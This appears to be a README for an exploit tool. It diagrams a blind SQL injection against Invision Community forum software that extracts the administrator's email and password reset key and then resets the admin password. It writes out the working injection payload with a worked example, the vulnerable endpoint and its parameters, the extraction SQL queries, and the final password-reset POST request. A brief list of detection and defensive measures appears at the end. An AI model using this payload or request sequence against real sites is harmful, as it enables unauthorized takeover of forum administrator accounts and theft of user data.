README.md
Rendering markdown...
# Invision Community SQLi Exploit - Technical Flow Diagram
## Exploitation Flow Overview
```
┌─────────────────────────────────────────────────────────────────┐
│ START: User Runs Exploit │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Step 1: Initialize Session │
│ • Create requests.Session() │
│ • Disable SSL verification │
│ • Set up user agent │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Step 2: Fetch CSRF Token │
│ HTTP GET → target_url │
│ Extract: csrfKey: "abc123..." │
│ Method: Regex pattern matching │
└───────────────────────────────┬─────────────────────────────────┘
│
┌───────────┴───────────┐
│ CSRF Found? │
└───────────┬───────────┘
Yes │ No
┌───────────┴──────────┐
│ │
▼ ▼
┌──────────┐ ┌──────────┐
│ Continue │ │ Error │
└────┬─────┘ │ Exit │
│ └──────────┘
▼
┌─────────────────────────────────────────────────────────────────┐
│ Step 3: Extract Admin Email (SQL Injection) │
│ │
│ SQL Query: SELECT email FROM core_members WHERE member_id=1 │
│ │
│ Injection Point: location parameter │
│ Payload: '))OR(SELECT 1 RLIKE(IF(condition,0x28,0x31)))# │
│ │
│ Algorithm: Binary Search (256 → 128 → 64 → ... → final char) │
│ For each character position: │
│ • Test 8 times (binary search) │
│ • Check if error message appears │
│ • Determine ASCII value │
│ • Repeat until NULL byte │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Result: [email protected] │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Step 4: Manual Password Reset Request │
│ • User navigates to password reset page │
│ • User enters extracted admin email │
│ • User requests password reset │
│ • User presses ENTER in exploit script │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Step 5: Extract Password Reset Key (SQL Injection) │
│ │
│ SQL Query: SELECT vid FROM core_validating │
│ WHERE member_id=1 AND lost_pass=1 │
│ ORDER BY entry_date DESC LIMIT 1 │
│ │
│ Same binary search algorithm as Step 3 │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Result: xyz789abc123def456... │
└───────────────────────────────┬─────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ Step 6: Reset Admin Password │
│ HTTP POST → /index.php?/lostpassword/ │
│ Parameters: │
│ • do=validate │
│ • vid={extracted_reset_key} │
│ • mid=1 │
│ • password={new_password} │
│ • password_confirm={new_password} │
│ • csrfKey={csrf_token} │
└───────────────────────────────┬─────────────────────────────────┘
│
┌───────────┴───────────┐
│ Status 301/302? │
└───────────┬───────────┘
Yes │ No
┌───────────┴──────────┐
│ │
▼ ▼
┌──────────────────┐ ┌─────────────┐
│ SUCCESS! │ │ FAILED │
│ Display creds │ │ Error msg │
└──────────────────┘ └─────────────┘
```
## Binary Search Algorithm Detail
```
Finding character at position N:
Start: test_value = 256, min = True
Iteration 1: test = 256 - 128 = 128
Payload: ...IF(ORD(SUBSTR((...),N,1))<128,0x28,0x31)...
Error? → min = True/False
Iteration 2: test = 128 ± 64
Payload: ...IF(ORD(SUBSTR((...),N,1))<test,0x28,0x31)...
Error? → min = True/False
Iteration 3: test = current ± 32
... continue ...
Iteration 8: test = current ± 1
Final ASCII value determined
Result: chr(final_value)
Example for letter 'A' (ASCII 65):
256 → 128 → 64 → 96 → 64 → 64 → 64 → 65
```
## HTTP Request Flow
```
1. Initial CSRF Fetch:
┌──────────────────────────────────────┐
│ GET http://target.com/forum/ │
│ │
│ Response: HTML with CSRF token │
│ Extract: csrfKey: "abc123..." │
└──────────────────────────────────────┘
2. SQL Injection Request (per character):
┌──────────────────────────────────────┐
│ POST http://target.com/index.php │
│ │
│ Parameters: │
│ app=calendar │
│ module=calendar │
│ controller=view │
│ do=search │
│ form_submitted=1 │
│ csrfKey=abc123... │
│ location=SQLi_PAYLOAD │
│ │
│ Check Response: │
│ Contains "elErrorMessage"? → True │
│ No error message? → False │
└──────────────────────────────────────┘
3. Password Reset:
┌──────────────────────────────────────┐
│ POST /index.php?/lostpassword/ │
│ │
│ Parameters: │
│ do=validate │
│ vid=extracted_key │
│ mid=1 │
│ password=new_password │
│ password_confirm=new_password │
│ resetpass_submitted=1 │
│ csrfKey=abc123... │
│ │
│ Expected Response: 301/302 redirect │
└──────────────────────────────────────┘
```
## SQL Injection Payload Structure
```
Base Payload:
'))OR(SELECT 1 RLIKE(IF({CONDITION},{TRUE},{FALSE})))#
Components:
')) - Close existing SQL syntax
OR - Logical OR operator
(SELECT 1 - Subquery that returns 1
RLIKE - Regular expression match operator
(IF( - Conditional function
{CONDITION}, - Our test condition
0x28, - '(' - Creates regex error if TRUE
0x31 - '1' - Matches if FALSE
)))
# - Comment out rest of query
Example for testing if first char of email < 128:
'))OR(SELECT 1 RLIKE(IF(
ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,
0x28,
0x31
)))#
How it works:
• If condition TRUE: RLIKE receives '(' → regex error → "elErrorMessage" appears
• If condition FALSE: RLIKE receives '1' → matches → no error
• By checking for error, we know if condition is true/false
```
## Class Structure
```
InvisionSQLiExploit
│
├── __init__(target_url, verbose)
│ ├── Initialize session
│ ├── Set target URL
│ └── Configure SSL/warnings
│
├── print_banner()
│ └── Display ASCII banner
│
├── log_info(message)
├── log_success(message)
├── log_error(message)
├── log_warning(message)
└── log_verbose(message)
└── Colored output methods
│
├── fetch_csrf_token()
│ ├── HTTP GET request
│ ├── Regex extraction
│ └── Return True/False
│
├── sql_injection(sql_query)
│ ├── Initialize variables
│ ├── For each character:
│ │ ├── Binary search loop
│ │ ├── Build payload
│ │ ├── HTTP POST request
│ │ ├── Check for error
│ │ └── Calculate ASCII value
│ └── Return extracted data
│
└── exploit()
├── print_banner()
├── fetch_csrf_token()
├── sql_injection(email_query)
├── User interaction (password reset)
├── sql_injection(reset_key_query)
└── HTTP POST (password reset)
```
## Data Flow Diagram
```
┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
│ User │────▶│ Script │────▶│ Target │────▶│ Database │
│ Input │ │ Logic │ │ Server │ │ │
└──────────┘ └──────────┘ └──────────┘ └──────────┘
│ │ │ │
│ target_url │ │ │
├────────────────▶│ │ │
│ │ GET / │ │
│ ├────────────────▶│ │
│ │ HTML + CSRF │ │
│ │◀────────────────┤ │
│ │ │ │
│ │ POST /index.php │ │
│ │ (SQLi payload) │ │
│ ├────────────────▶│ │
│ │ │ SQL Query │
│ │ ├────────────────▶│
│ │ │ Result/Error │
│ │ │◀────────────────┤
│ │ Response │ │
│ │◀────────────────┤ │
│ │ (analyze error) │ │
│ │ │ │
│ [User requests │ │ │
│ password reset]│ │ │
├────────────────▶│ │ │
│ │ │ │
│ │ POST /lostpass │ │
│ │ (reset admin) │ │
│ ├────────────────▶│ │
│ │ │ UPDATE password │
│ │ ├────────────────▶│
│ │ 301 Redirect │ │
│ │◀────────────────┤ │
│ Success! │ │ │
│◀────────────────┤ │ │
│ (credentials) │ │ │
```
## Time Complexity
```
Per Character Extraction:
• Binary search: 8 iterations (log₂(256))
• Each iteration: 1 HTTP request
• Total per char: ~8 requests
For typical admin email (20 characters):
• Total requests: 20 × 8 = 160 requests
• At ~1 second per request: ~3 minutes
For reset key (30 characters):
• Total requests: 30 × 8 = 240 requests
• At ~1 second per request: ~4 minutes
Total exploitation time: ~7-10 minutes
(depends on network latency)
```
## Security Considerations
```
Detection Vectors:
┌─────────────────────────────────────┐
│ • Multiple requests to same endpoint │
│ • Unusual parameter values │
│ • Pattern of requests │
│ • Error message triggers │
│ • Time-based analysis │
└─────────────────────────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Defensive Measures: │
│ • Web Application Firewall (WAF) │
│ • Rate limiting │
│ • Input validation │
│ • Error message suppression │
│ • SQL injection detection │
│ • Anomaly detection │
└─────────────────────────────────────┘
```
---
## Visual Legend
```
┌────┐
│Box │ = Process/Action
└────┘
↓ = Flow direction
┌───┐
│? │ = Decision point
└───┘
[ ] = User interaction
{ } = Variable/Data
```
---
This diagram provides a complete visual understanding of how the exploit works from start to finish!